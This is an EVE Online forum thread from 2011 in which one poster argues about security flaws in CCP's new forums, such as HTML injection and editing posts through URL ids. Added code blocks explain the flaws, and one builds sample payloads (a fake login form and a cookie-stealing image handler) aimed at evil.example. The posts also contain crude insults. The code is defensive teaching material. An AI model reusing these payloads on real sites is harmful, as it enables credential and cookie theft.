
dexington
Caldari Baconoration
|
Posted - 2011.04.10 00:02:00 -
[1]
Originally by: Froosh It took CCP eighteen months to make a skin for an open source forum.
CCP - 13 148 man hours doing nothing.
They must have used some time on removing whatever security features the forums had...
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 00:38:00 -
[2]
Originally by: Durzel If Sreegs isn't a web developer then how can you expect him to know whether something is exploitable or not?
If you can manipulate data across accounts just by editing ids in the url, someone in charge of security should probably realize that the system lacks any form of effective user authentication. It may not be Sreegs' job to do the testing, but somewhere down the line it has to be someone's job to make sure the testing gets done...
|
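The flaw described in post [2], editing an id in the url to touch another account's data, is the classic missing authorization check. The example below is an added illustration and not CCP's forum code; the post store, session shape and handler names are assumptions. It shows an edit handler that only checks that the caller is logged in, beside one that also checks that the caller owns the post (or is a moderator) before writing.

```javascript
// Added example (not the forum's real code). Demonstrates an insecure direct
// object reference: the server reads ?id= from the URL and trusts it.

// Fresh in-memory store per call so the handlers can be exercised repeatedly.
function createStore() {
  return new Map([
    [101, { author: "alice", body: "original text by alice" }],
    [102, { author: "bob",   body: "original text by bob" }],
  ]);
}

// Parse the post id out of an edit URL such as /editpost.aspx?id=102
// (path and parameter name are assumed). Anything that is not a plain
// decimal number is rejected rather than coerced.
function parsePostId(url) {
  const id = new URL(url, "http://forums.example").searchParams.get("id");
  if (id === null || !/^\d+$/.test(id)) return null;
  return Number(id);
}

// Vulnerable: authentication only. Any logged-in user can edit any post
// just by changing the id in the URL.
function editPostVulnerable(store, session, postId, newBody) {
  if (!session || !session.user) return { status: 401 };
  const post = store.get(postId);
  if (!post) return { status: 404 };
  post.body = newBody;                       // no ownership check at all
  return { status: 200 };
}

// Fixed: authentication says who you are, authorization decides what you
// may touch. The check is done server-side against the stored author,
// never against anything the client sends.
function editPostFixed(store, session, postId, newBody) {
  if (!session || !session.user) return { status: 401 };
  const post = store.get(postId);
  if (!post) return { status: 404 };
  const isOwner = post.author === session.user;
  const isModerator = Array.isArray(session.roles) && session.roles.includes("moderator");
  if (!isOwner && !isModerator) return { status: 403 };
  post.body = newBody;
  return { status: 200 };
}

// Stand-alone demo: bob tries to edit alice's post through both handlers.
function demo() {
  const bob = { user: "bob" };
  const id = parsePostId("/editpost.aspx?id=101");
  const vulnerable = editPostVulnerable(createStore(), bob, id, "edited by bob");
  const fixed = editPostFixed(createStore(), bob, id, "edited by bob");
  return { vulnerable: vulnerable.status, fixed: fixed.status };
}
```

The important design point is that the ownership check uses the author recorded in the store, so tampering with the URL, a hidden form field or a cookie cannot change the outcome.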

dexington
Caldari Baconoration
|
Posted - 2011.04.10 00:47:00 -
[3]
Originally by: Mortania But, in all seriousness. It sucks that you guys all had to come in on a weekend to try and fix some damned forums.
Most other companies deploy new code in the middle of the week, they could have done the same...
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 00:57:00 -
[4]
Originally by: Akita T how about an assurance that user feedback will be actually USED next time you ask us to test the forums ?
eve user feedback... 50% says the font is too small, 50% says it's not big enough... 50% says the background color should be black, 50% says it should be white...
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 01:04:00 -
[5]
Originally by: Copine Callmeknau The new forums should have everything the old forums have and more. Not a mixed bag of dubious features coupled with reduced functionality. Patience is not something you guys need to worry about here, we don't care if it gets released late so long as it's better, and that it WORKS when it gets released.
Except for the security being non-existent, the forums were ready for use, no reason not to release them.
Originally by: Copine Callmeknau Oh and an option for an ultra low bandwidth (no avatars, plain black background, no animations etc) mode would be great, I'm paying by the kb here and while I like the new look of the forum, sometimes I wanna post without chewing through my internet.
Disable images in your browser if it's that big a problem...
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 01:12:00 -
[6]
Originally by: Mortania
Originally by: dexington
Except for the security being non-existent, the forums were ready for use, no reason not to release them.
You're a moron. img support, sigs, color support, read/unread posts, understandable last read functionality, like system, all broken.
And I'm not bringing in the visual items others complain about, because I found them mostly to be better.
NO UOI A MOROMN!!!!!
I had no problems with the new forums, some things seemed not 100% there yet and some features were missing, but it worked for me.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 04:25:00 -
[7]
Originally by: Fearless M0F0 Btw, storing sensitive data such as my char id in unencrypted cookies? . Do they know about the ASP.NET Session object?
Are you talking about the charid everyone can see by mousing over your picture here on the forums?
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 10:59:00 -
[8]
Originally by: Bomberlocks The problem is that an injected keylogger could conceivably get hold of your forum username and password.
Not going to happen without the user downloading and installing the program, you can't just inject a running keylogger using html. Unless the attack is exploiting another security hole in the browser, it would be much the same as linking a url to malware on this forum.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 11:18:00 -
[9]
Edited by: dexington on 10/04/2011 11:19:45
Originally by: Grimpak
Quote: The new EVE forums need a special plugin to read them. Install? <yes> <no>.
I think this type of attack is conceivable with the html vulnerabilities that existed on the forum.
Even if this is possible you would still need to download the software from another server, and run it yourself. There would be no automated installation and execution of the keylogger.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 11:58:00 -
[10]
Originally by: Kerfira
Given the average internet knowledge of people, how many would press 'Yes' to the 'Request to Install EVE Forum Search plugin' popup?
That the security holes even allowed something like that to BE there would be enough to seriously compromise a lot of peoples accounts...
Probably not as many as you think, everyone is so paranoid over getting hacked that a lot of people in fact do double check unexpected install options. Within the first 5 people seeing the popup, I'm sure at least one of them would notice something is wrong. After that the window of opportunity is more or less closed, as people would start to warn about something not being right.
It is a problem that you could inject html into the page, and it does open up for some types of attack chains. On the other hand it's not something that is easily exploited to gain full system access, it's a common type of security flaw and it is considered a minor one.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 12:10:00 -
[11]
Originally by: Bomberlocks You don't need to download any software since the keylogger is done in javascript.
Was anyone able to inject js code? I didn't see anything working except html.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 12:37:00 -
[12]
Originally by: Bomberlocks
Originally by: dexington
Originally by: Bomberlocks You don't need to download any software since the keylogger is done in javascript.
Was anyone able to inject js code? I didn't see anything working except html.
How do you think the html was injected? 
You make it sound like js was used to inject html, how do you inject js when you can't inject html?
|

dexington
Caldari Baconoration
|
Posted - 2011.04.10 14:53:00 -
[13]
Originally by: CCP Sreegs I'm not claiming. I'm stating outright that customer data was never at risk. We've also said there will be a blog which will detail what occurred and what was wrong.
If I remember correctly the "EVE Technology Lab" forums had posts with people posting links to 3rd party tools, and with people being able to edit all posts it would be possible to change the links without the users downloading the tools noticing the change.
Have you been able to verify that no data tampering was going on while the forums were online, else everyone who downloaded any program using links from the forums could potentially be at risk of running modified versions.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 13:31:00 -
[14]
Originally by: MisterAl tt1
To allow code insertion into signatures! What kind of "specialists" work there?! How could've you bring OUR computers under such a risk?!
Well, I'm sure CCP will state everything is OK and there was no risk. Even with my little knowledge I can say that they LIE.
hahah... you better format your computer, to be sure there is no malware installed. Remember to turn off your computer for 45 min after the format, just to be sure nothing survives in memory!
Anyway, when do we see the dev blog? Can someone confirm the rumors that the head of security called in sick today?
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 13:45:00 -
[15]
Originally by: MisterAl tt1
Meaning "let it slide and let CCP don't bother about doing some non-professional work again" ? No. I want CCP to see that users ARE interested in seeing CCP really do something like they should.
You just want to ***** and whine, did someone put chili on your tampax or what?
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 14:37:00 -
[16]
Originally by: MisterAl tt1 Trolls damage controling CCP ? How nice.
You don't seem to understand troll culture, they are the superheroes of the internet, fighting to save the internet from people like you!
Every time too many self-righteous, too-stupid-to-know-better, angry forum warriors gather for a session of group jerking, while discussing some crackpot theory, e.g. how html/javascript injection in mmo forums is going to change the world as we know it, that's when the superhero troll emerges to try and save the internet from stupidity.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 14:40:00 -
[17]
Originally by: Hel O'Ween
Originally by: Miilla
Given the attitude this guy has, he probably wrote it in rage speak in the email and bug report with l33t too. I can see why it would be downgraded or ignored.
Granted, Cat isn't a trained diplomat, but he has been a helpful member of the 3rd party dev community over the years. Just check out the Tech Lab forums for his posts, before you make any wild assumptions.
And if you as a company ignore a bug report about a serious security issue because you don't like "the sound" of it, you're doing it terribly wrong.
A. ****** was also a productive member of society as a youth, no one really seemed to care about that after WW2.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 14:45:00 -
[18]
Edited by: dexington on 11/04/2011 14:45:06
Originally by: Miilla When you write a bug, write it clear and concise and include the impact. you dont run off in an ego tantrum...
Finding security bugs is all about showing the other guy you know more about programming and it-tech than he does, the world needs to know when you are better than someone else.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 14:52:00 -
[19]
Edited by: dexington on 11/04/2011 14:52:10
Originally by: Miilla That is why those people never make management or lead positions as they cannot handle the decision process and lack maturity in the thinking. The higher up you go the more it becomes less a technical decision and more a business decision. Learn that and you will go far otherwise you end up sitting in your cage competing with students (cheaper and work longer hours). True fact of employment.
You make it sound like that's a bad thing, you can easily get a salary where money is not a big deal without being in management, and you don't have to do the meetings and the hierarchical butt kissing... not being in management is win/win.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 15:13:00 -
[20]
Originally by: Niraia
I'm trying to figure out what the business reasons for releasing a forum replacement that wasn't tested for security are, but I can't.
Maybe they were behind schedule, and when asked if they were ready to deploy someone took a chance and said yes. It's always the last 10% that takes 90% of the time, it's so much easier to do the last changes/fixes when you have user feedback/test data from a running system, someone probably believed the last fixes and changes could be applied to the deployed system. Probably would even have been a good idea, had it not been for security issues they needed to fix.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 16:21:00 -
[21]
Originally by: Zey Nadar Don't you see Miilla is a professional troll? Youve been trolled! Above post proves it.
ZOMG!1 you are so off topic, you must be one of the trolls in cahoots with Miilla, i see right through your trolling disguised as counter trolling.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 17:22:00 -
[22]
Originally by: Hel O'Ween After no action has been taken by CCP, he demonstrated the security problems. This is common practice.
Common practice would be to wait with public disclosure until it's confirmed that the issue is solved. Hacking into a website, no matter what the reason, is a crime in most parts of the world.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 20:51:00 -
[23]
Originally by: phintais I can't find anyone online that likes the new forums.
I liked the new forums.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 21:16:00 -
[24]
Originally by: Sullen Skoung Has Sreegs posted that blog yet?
They kicked him out before he had time to write it.
|

dexington
Caldari Baconoration
|
Posted - 2011.04.11 23:38:00 -
[25]
Originally by: Calathea Sata They need another 72,000 man hour... to fix the problems they have created. So here goes another 18 months!
I don't believe you!
After multiple threads about you leaving the game you are still here, how can you expect anyone to ever believe anything you say?
|

dexington
Caldari Baconoration
|
Posted - 2011.04.12 02:49:00 -
[26]
Originally by: Marwood Ford You are leaving the failboat though, right?
Seems like she got off the fail boat, and jumped on the attention ***** train...
|

dexington
Caldari Baconoration
|
Posted - 2011.04.12 12:01:00 -
[27]
Originally by: Kristina Vanszar Edited by: Kristina Vanszar on 12/04/2011 10:05:00 The DEV BLOG,
not at risk, sorry guys this must be a joke, as you've said, it was possible to include HTML. Who would prevent me from adding a div, which looks exactly like your login one, make it be at exactly the same position as the original one, and gather some login information???
OR, add an HTML or even an iframe which calls an external script?
Sorry, but I do not believe that devblog....
Just as a side tip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
lol, who would stop you from using that bug to launch some nukes... we better call the pentagon right away, and make them aware of the danger.
|
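Posts [11] and [12] argue over whether "only html" injection matters, and post [27] describes the two things it enables even without a script tag: a fake login form layered over the real one, and an iframe or image pulling from an external host. The block below is an added illustration, not code from the forums or from CCP: it renders a user signature three ways, with no escaping, with the kind of blocklist that strips `<script>` and stops there, and with proper output escaping. The payloads and the `evil.example` host are constructed for the example; the point is that the blocklist removes the script tag yet leaves the phishing form and the `onerror` handler fully live, while escaping neutralises all three.

```javascript
// Added example (not the forum's real rendering code). Compares three ways of
// putting user-controlled signature text into a page.

// Escape the five characters that can break out of text or attribute context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The naive blocklist: remove <script ...> and </script> and hope for the best.
function stripScriptTags(html) {
  return html.replace(/<\s*\/?\s*script\b[^>]*>/gi, "");
}

function renderSignatureUnsafe(sig)    { return `<div class="sig">${sig}</div>`; }
function renderSignatureBlocklist(sig) { return `<div class="sig">${stripScriptTags(sig)}</div>`; }
function renderSignatureEscaped(sig)   { return `<div class="sig">${escapeHtml(sig)}</div>`; }

// Constructed payloads (assumed for the example, not taken from the thread).
// 1. Pure HTML, no JavaScript: a login form positioned over the real one that
//    posts credentials to an attacker-controlled host.
const PHISHING_FORM =
  '<form action="https://evil.example/collect" method="post" ' +
  'style="position:absolute;top:0;left:0">Session expired, log in again: ' +
  '<input name="u"><input name="p" type="password"><input type="submit"></form>';
// 2. JavaScript without a <script> tag: an event handler on a broken image.
const EVENT_HANDLER_JS =
  '<img src=x onerror="new Image().src=\'https://evil.example/c?\'+document.cookie">';
// 3. The one thing the blocklist actually catches.
const SCRIPT_TAG = '<script src="https://evil.example/keylog.js"></script>';

// Does the user-controlled region of the rendered output still contain any
// live tag? Escaped text has no "<" left, so it never does.
function containsActiveMarkup(rendered) {
  const prefix = '<div class="sig">', suffix = "</div>";
  const inner = rendered.slice(prefix.length, rendered.length - suffix.length);
  return /<\/?[a-z][^>]*>/i.test(inner);
}

// Stand-alone demo: for each renderer, how many of the three payloads survive.
function survivingPayloads() {
  const payloads = [PHISHING_FORM, EVENT_HANDLER_JS, SCRIPT_TAG];
  const count = (render) => payloads.filter((p) => containsActiveMarkup(render(p))).length;
  return {
    unsafe:    count(renderSignatureUnsafe),     // 3
    blocklist: count(renderSignatureBlocklist),  // 2
    escaped:   count(renderSignatureEscaped),    // 0
  };
}
```

If a forum wants formatting in signatures, the workable route is an allowlisted markup language (bbcode or a strict HTML sanitiser) that re-emits only known-safe tags and attributes; filtering out the tags you can think of, as the blocklist above does, is the approach that left the "html only" hole debated in this thread.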